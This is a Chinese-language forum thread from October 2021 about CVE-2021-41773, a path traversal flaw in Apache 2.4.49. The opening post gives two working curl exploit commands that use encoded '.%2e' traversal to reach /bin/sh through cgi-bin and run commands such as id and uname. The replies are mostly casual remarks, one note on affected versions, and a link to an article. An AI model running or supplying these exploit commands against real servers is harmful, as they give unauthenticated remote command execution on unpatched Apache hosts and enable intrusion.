新漏洞

spr1ng · 发表于 2021-10-6 17:03:57

CVE-2021-41773升级为无码版命令执行[惊恐]

exp:
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

curl --data "A=|id>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

imtoken · 发表于 2021-10-6 18:12:48

此问题仅影响 Apache 2.4.49 而不是早期版本。

Mr.Qin · 发表于 2021-10-6 17:04:54

提示: 作者被禁止或删除内容自动屏蔽

optimism · 发表于 2021-10-6 17:05:45

还行

acpp · 发表于 2021-10-6 17:06:26

本帖最后由 acpp 于 2021-10-6 17:11 编辑

v2.4.49 就这版本的目录穿越吧

等1下™我老公呢 · 发表于 2021-10-6 17:07:31

看不懂就不参与了

ccf · 发表于 2021-10-6 17:10:05

Apache？不用这个...

笑花落半世琉璃 · 发表于 2021-10-6 17:11:07

看不懂说点听的懂得

nmdwsm · 发表于 2021-10-6 17:16:26

看不懂
zsbd

LikeOracle · 发表于 2021-10-6 17:19:55

我还以为甲骨文又出啥漏洞了

tomcb · 发表于 2021-10-6 17:21:39

Mr.Qin 发表于 2021-10-6 17:04
不觉明历

https://www.secrss.com/articles/34890

我用NGINX

		自动登录	找回密码
密码			注册

Mr.Qin Mr.Qin 当前离线积分 7164	2^# 发表于 2021-10-6 17:04:54 来自手机 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
Mr.Qin Mr.Qin 当前离线积分 7164
	回复举报

[疑问] 新漏洞

浏览过的版块